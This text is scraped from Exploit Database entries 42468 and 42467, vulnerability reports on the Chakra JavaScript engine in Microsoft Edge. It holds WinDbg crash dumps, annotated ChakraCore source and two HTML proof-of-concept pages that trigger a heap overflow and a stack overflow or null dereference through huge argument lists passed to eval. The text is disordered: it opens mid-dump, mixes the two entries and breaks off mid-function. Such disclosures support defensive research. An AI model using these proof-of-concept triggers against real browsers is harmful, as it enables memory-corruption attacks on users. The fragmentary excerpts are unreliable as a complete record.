0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 0:016> g STATUS_STACK_BUFFER_OVERRUN encountered (1590.b70): Break instruction exception - code 80000003 (first chance) KERNELBASE!UnhandledExceptionFilter+0x85960: 00007ffe`9e61c120 cc int 3 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960 00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a 00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169 00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38 00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd 00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368 00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 --> <html> <head> <title> POC </title> </head> <script> var a = '0x42424242,'.repeat(0xFFFF-2); var b = "function Car(){} var car = new Car(a,"+a+"a);"; eval(b); </script> </html>
Exploit Database EDB-ID : 42468

Date de publication : 2017-08-16 22h00 +00:00
Auteur : Huang Anwen
EDB Vérifié : No

<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team This is the HEAP BASED OVERFLOW version of the issue. // ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs) { [...] if (!isAsmJs && executeFunction->IsCoroutine()) { [...] } else { InterpreterStackFrame::Setup setup(function, args); size_t varAllocCount = setup.GetAllocationVarCount(); //printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount); size_t varSizeInBytes = varAllocCount * sizeof(Var); // // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack. // DWORD_PTR stackAddr; // If the locals area exceeds a certain limit, allocate it from a private arena rather than // this frame. The current limit is based on an old assert on the number of locals we would allow here. if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!! { ArenaAllocator *tmpAlloc = nullptr; fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc); allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes); stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step) } else { PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes); allocation = (Var*)_alloca(varSizeInBytes); #if DBG memset(allocation, 0xFE, varSizeInBytes); #endif stackAddr = reinterpret_cast<DWORD_PTR>(allocation); } [...] return aReturn; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff7`49700000 00007ff7`49725000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffa`13700000 00007ffa`138db000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffa`119f0000 00007ffa`11a9e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffa`0e140000 00007ffa`0e1be000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffa`11b80000 00007ffa`11e79000 C:\Windows\System32\combase.dll ModLoad: 00007ffa`103f0000 00007ffa`104e6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffa`11160000 00007ffa`11285000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffa`104f0000 00007ffa`1055a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffa`11630000 00007ffa`116cd000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffa`0a400000 00007ffa`0a460000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffa`10c90000 00007ffa`10d50000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ff9`f3680000 00007ff9`f3a44000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffa`10560000 00007ffa`10c52000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffa`11940000 00007ffa`119e1000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffa`11b20000 00007ffa`11b79000 C:\Windows\System32\sechost.dll ModLoad: 00007ffa`113e0000 00007ffa`11431000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffa`10c60000 00007ffa`10c87000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffa`10200000 00007ffa`10388000 C:\Windows\System32\gdi32full.dll ModLoad: 00007ffa`10d60000 00007ffa`10eaa000 C:\Windows\System32\USER32.dll ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000 C:\Windows\System32\win32u.dll ModLoad: 00007ffa`11790000 00007ffa`1183a000 C:\Windows\System32\shcore.dll ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000 C:\Windows\System32\profapi.dll ModLoad: 00007ffa`08380000 00007ffa`08606000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffa`115b0000 00007ffa`1161c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffa`10d50000 00007ffa`10d58000 C:\Windows\System32\NSI.dll ModLoad: 00007ffa`11730000 00007ffa`1175d000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffa`054d0000 00007ffa`054f2000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffa`045d0000 00007ffa`045eb000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffa`11290000 00007ffa`113d5000 C:\Windows\System32\ole32.dll ModLoad: 00007ffa`0e370000 00007ffa`0e405000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ff9`f1650000 00007ff9`f2d01000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ff9`f0e60000 00007ff9`f164b000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffa`04630000 00007ffa`0466f000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffa`04d30000 00007ffa`04dfb000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffa`09f90000 00007ffa`0a096000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffa`0b640000 00007ffa`0b912000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffa`0da10000 00007ffa`0daf3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffa`0abe0000 00007ffa`0b111000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffa`11e80000 00007ffa`132b7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffa`101b0000 00007ffa`101f9000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffa`11440000 00007ffa`115a6000 C:\Windows\System32\msctf.dll ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ff9`fddf0000 00007ff9`fde00000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffa`00260000 00007ffa`0027b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffa`07430000 00007ffa`07507000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffa`0f420000 00007ffa`0f47c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffa`0a730000 00007ffa`0a73b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffa`07260000 00007ffa`07428000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ff9`fe760000 00007ff9`fe77a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000 C:\Windows\System32\rmclient.dll ModLoad: 00007ff9`fd750000 00007ff9`fd768000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ff9`fb720000 00007ff9`fb767000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffa`0d180000 00007ffa`0d45f000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffa`0db30000 00007ffa`0dc52000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffa`060c0000 00007ffa`060e8000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ff9`f8480000 00007ff9`f84fa000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ff9`ff120000 00007ff9`ff17d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffa`0d460000 00007ffa`0da04000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffa`06cf0000 00007ffa`06faf000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ff9`f8060000 00007ff9`f80ba000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffa`06950000 00007ffa`0695f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffa`06480000 00007ffa`06490000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffa`06ab0000 00007ffa`06b38000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ff9`fe370000 00007ff9`fe411000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffa`06760000 00007ffa`06774000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffa`05a10000 00007ffa`05a48000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffa`06b40000 00007ffa`06cc8000 C:\Windows\SYSTEM32\windows.globalization.dll (11fc.108c): Access violation - code c0000005 (!!! second chance !!!) chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=???????????????? 0:016> r rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0 rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0 rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10 r8=0000015e3d500030 r9=0000015e2c538000 r10=000000388f1fb918 r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120 r14=0000000000000000 r15=0000015e4063f9b3 iopl=0 nv up ei pl nz ac pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210 chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=???????????????? 0:016> dq ecx 0000015e`3d5401b0 00000000`00000000 00010000`42424242 0000015e`3d5401c0 00010000`42424242 00010000`42424242 0000015e`3d5401d0 00010000`42424242 00010000`42424242 0000015e`3d5401e0 00010000`42424242 00010000`42424242 0000015e`3d5401f0 00010000`42424242 00010000`42424242 0000015e`3d540200 00010000`42424242 00010000`42424242 0000015e`3d540210 00010000`42424242 00010000`42424242 0000015e`3d540220 00010000`42424242 00010000`42424242 0:016> dq [ecx+edx*8] 0000015e`3d550000 ????????`???????? ????????`???????? 0000015e`3d550010 ????????`???????? ????????`???????? 0000015e`3d550020 ????????`???????? ????????`???????? 0000015e`3d550030 ????????`???????? ????????`???????? 0000015e`3d550040 ????????`???????? ????????`???????? 0000015e`3d550050 ????????`???????? ????????`???????? 0000015e`3d550060 ????????`???????? ????????`???????? 0000015e`3d550070 ????????`???????? ????????`???????? 0:016> !address ecx Failed to map Heaps (error 8007001e) Usage: <unclassified> Allocation Base: 0000015e`3d500000 Base Address: 0000015e`3d500000 End Address: 0000015e`3d550000 Region Size: 00000000`00050000 Type: 00020000 MEM_PRIVATE State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE 0:016> !address 0000015e`3d550000 Usage: Free Base Address: 0000015e`3d550000 End Address: 0000015e`3d7f0000 Region Size: 00000000`002a0000 Type: 00000000 State: 00010000 MEM_FREE Protect: 00000001 PAGE_NOACCESS 0:016> kb RetAddr : Args to Child : Call Site 00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd 00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51 00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba 00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77 00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a 00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8 00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d 00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93 00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114 00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c 00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250 00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c 00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51 00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2 00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93 00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100 00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b 00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a 00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124 00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5 00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436 00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1 00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119 00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202 00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357 00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f 00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d 00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204 00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1 00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f 00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63 00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3 00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d 00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23 00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b 00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236 00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70 00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3 00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53 00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125 00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280 00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f 00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee 00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab 00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48 00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 --> <html> <head> <title> POC </title> </head> <script> var a=[]; a.length=0xffff-1; a.fill('0x42424242'); var s='{'; for(var i=0; i<0x8000-1; i++){ s+= 'a'+i+':0,' }; s+= 'b:0'; s+= '}'; var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')'; eval(c); </script> </html>
Exploit Database EDB-ID : 42467

Date de publication : 2017-08-16 22h00 +00:00
Auteur : Huang Anwen
EDB Vérifié : No

<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team The issue could lead a nullptr derefrence besides a stack overflow we metioned previously. // ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp Js::ArgSlot EmitArgList( ParseNode *pnode, Js::RegSlot rhsLocation, Js::RegSlot thisLocation, Js::RegSlot newTargetLocation, BOOL fIsEval, BOOL fAssignRegs, ByteCodeGenerator *byteCodeGenerator, FuncInfo *funcInfo, Js::ProfileId callSiteId, uint16 spreadArgCount = 0, Js::AuxArray<uint32> **spreadIndices = nullptr) { // This function emits the arguments for a call. // ArgOut's with uses immediately following defs. EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId); Js::RegSlot evalLocation = Js::Constants::NoRegister; // // If Emitting arguments for eval and assigning registers, get a tmpLocation for eval. // This would be used while generating frameDisplay in EmitArgListEnd. // if (fIsEval) { evalLocation = funcInfo->AcquireTmpRegister(); } if (spreadArgCount > 0) //spreadArgCount==0 because of overflow**** { const size_t extraAlloc = spreadArgCount * sizeof(uint32); Assert(spreadIndices != nullptr); *spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount); //skip initialization of spreadIndices**** } size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices); Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId); if (fIsEval) { funcInfo->ReleaseTmpRegister(evalLocation); } return argumentsCount; } // ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp size_t EmitArgs( ParseNode *pnode, BOOL fAssignRegs, ByteCodeGenerator *byteCodeGenerator, FuncInfo *funcInfo, Js::ProfileId callSiteId, Js::AuxArray<uint32> *spreadIndices = nullptr ) { Js::ArgSlot argIndex = 0; Js::ArgSlot spreadIndex = 0; if (pnode != nullptr) { while (pnode->nop == knopList) { // If this is a put, the arguments have already been evaluated (see EmitReference). // We just need to emit the ArgOut instructions. if (fAssignRegs) { Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false); } if (pnode->sxBin.pnode1->nop == knopEllipsis) { Assert(spreadIndices != nullptr); spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' //nullptr derefrence**** 